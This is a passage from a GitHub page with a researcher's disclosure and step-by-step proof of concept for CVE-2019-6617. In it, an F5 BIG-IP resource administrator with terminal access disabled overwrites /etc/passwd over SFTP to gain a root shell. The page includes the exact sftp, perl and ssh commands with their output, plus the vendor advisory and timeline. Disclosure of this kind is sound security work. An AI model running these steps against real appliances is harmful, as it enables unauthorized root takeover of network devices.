Skip to content
Permalink
master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
Go to file
 
 
Cannot retrieve contributors at this time
Title: F5 BIG-IP Resource Administrator Privilege Escalation
Author: Rich Mirch
CVE: CVE-2019-6617
Vendor Advisory: https://support.f5.com/csp/article/K38941195
Description
An F5 BIG-IP account with the resource administrator role while also having
terminal access disabled still has the ability to access the appliance via
SFTP as root. This PoC will show that a resource administrator can obtain root
access to the appliance and take full control with terminal access disabled.
Technical details
A local account configured with the resource administrator role is created as
a Linux user with uid set to zero/root. SSH is not allowed when terminal
access is disabled. The problem is that the SFTP service is still allowed
without any restrictions. Since a resource administrator account is a Linux
root account, it has the ability to overwrite any file on the system.
Note: The SSH service must be enabled and the management interface accessible.
CVSS
Vector: CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H/E:H/RL:O/RC:C
Base: 7.2
Temporal: 6.9
Test Environment
F5 BIG-IP Virtual Edition 14.0.0.1
[root@bigip14:Active:Standalone] ~ # tmsh show sys version
Sys::Version
Main Package
Product BIG-IP
Version 14.0.0.1
Build 0.0.2
Edition Point Release 1
Date Fri Aug 17 16:22:25 PDT 2018
A resource administrator account(resadmin) with the following attributes was used for this PoC.
Note the shell attribute is set to “none".
[root@bigip14:Active:Standalone] ~ # tmsh list auth user resadmin | grep -v encrypted-password
auth user resadmin {
description resadmin
partition Common
partition-access {
all-partitions {
role resource-admin
}
}
shell none
}
Proof Of Concept
[Step 1]
Show that resadmin is not allowed to SSH.
$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:23:23 2018 from 1.2.3.4
This account is currently not available.
Connection to 5.6.7.8 closed.
[Step 2]
Connect to the appliance as resadmin via SFTP and retrieve the /etc/passwd file.
$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> get /etc/passwd
Fetching /etc/passwd to passwd
/etc/passwd 100% 1423 229.8KB/s 00:00
sftp> quit
[Step 3]
Update the local passwd file and change /sbin/nologin to /bin/bash for the resadmin user.
$ perl -p -i.orig -e 's!/sbin/nologin!/bin/bash! if /^resadmin/;' passwd
[Step 4]
Display a diff of the passwd change from step 3.
$ diff -u passwd.orig passwd
--- passwd.orig 2018-09-13 17:32:55.000000000 -0500
+++ passwd 2018-09-13 17:34:36.000000000 -0500
@@ -26,4 +26,4 @@
hsqldb:x:96:96::/var/lib/hsqldb:/sbin/nologin
syscheck:x:199:10::/:/sbin/nologin
restnoded:x:198:198::/:/sbin/nologin
-resadmin:x:0:500:resadmin:/home/resadmin:/sbin/nologin
+resadmin:x:0:500:resadmin:/home/resadmin:/bin/bash
[Step 5]
SFTP as resadmin and upload the modified passwd file to /etc/passwd.
$ /usr/bin/sftp resadmin@5.6.7.8
Password:
Connected to 5.6.7.8.
sftp> cd /etc
sftp> put passwd
Uploading passwd to /etc/passwd
passwd 100% 1419 541.3KB/s 00:00
sftp> quit
[Step 6]
Login as resadmin via SSH and obtain a bash shell running as the root user.
$ ssh resadmin@5.6.7.8
Password:
Last login: Thu Sep 13 15:30:39 2018 from 1.2.3.4
[resadmin@bigip14:Active:Standalone] ~ # echo $SHELL
/bin/bash
[resadmin@bigip14:Active:Standalone] ~ # id
uid=0(root) gid=500(webusers) groups=500(webusers),495(sdm) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023
Timeline:
2018-09-13: Reported to vendor
2018-09-14: Vendor confirmed vulnerability
2018-09-26: Vendor requested embargo
2018-12-07: Contacted vendor for update
2019-04-30: Vendor released fix and advisory